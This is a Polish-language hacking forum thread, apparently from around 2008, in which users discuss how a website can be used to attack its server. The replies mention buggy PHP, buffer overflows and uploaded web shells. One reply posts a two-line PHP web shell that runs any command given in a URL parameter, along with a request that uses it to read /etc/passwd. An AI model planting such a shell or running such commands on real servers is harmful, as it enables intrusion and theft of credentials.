Ze strony do serwera

kriss9366

Użytkownik
Dołączył
Sierpień 18, 2008
Posty
10
Od paru dni chodzi pewno pytanie : Czy jest jakiś rodzaj ataku który przez strone www atakuje serwer ?
Mam na myśli że widać wszystko co jest na serwerze np. pliki.

P.S. Chyba Zrozumiale napisałem jak nie to prosze o poprawki i wyrozumiałość ponieważ aż tak bardzo na atakach się nie znam
pozdro
Kriss
 

hxv

Były Moderator
Dołączył
Sierpień 9, 2006
Posty
797
Zdaje się że gdy np. serwer WWW jest dziurawy, zainstalowany PHP jest stary i ma błędy czy też dowolny inny program do którego można uzyskać dostęp przez stronę posiada błędy to można je wykorzystać. Jak? To już zależy od błędów, czasem DoS, czasem BoF a czasem uzyskanie dostępu do konta innego użytkownika w tym programie.
Jeśli uda ci się wgrać na stronę szela możesz czasem (gdy serwer jest niepoprawnie skonfigurowany) uzyskać dostęp do plików innych userów lub do pliku z hasłami.
 

hxv

Były Moderator
Dołączył
Sierpień 9, 2006
Posty
797
Buffer overFlow
<
To nie tyle atak co błąd w programie który można wykorzystać do ataku
<
 

Magnefikko

Były Moderator
Dołączył
Maj 29, 2004
Posty
709
Gdy serwer na prawdę ssie, możesz go dupić jak chcesz za pomocą prostych skryptów PHP do np. przeglądania plików na serwerze. Albo takich dziadostw jak to:

<?php
exec($_GET['ssij']);
?>

skrypt.php?ssij=cat ../../../../../etc/passwd
 

timpler

Użytkownik
Dołączył
Lipiec 28, 2008
Posty
95
Buffer overFlow To nie tyle atak co błąd w programie który można wykorzystać do ataku[/b]

Nie no wiem czy jest Buffer Overflow tylko pierwszy raz widze skrót BoF, zawsze i wszędzie widuje skrót BO...
smile.gif
 

hxv

Były Moderator
Dołączył
Sierpień 9, 2006
Posty
797
@timpler, poprzeglądaj sobie milw0rm, tam widziałem że tak piszą to i jak tak pisze
<


@topic: jeśli serwer stoi na windowsie i ma beznadziejne zabezpieczenia to można nawet trojana odpalić (to się raczej zdarza z małymi, prywatnymi serwerami).
 
Do góry Bottom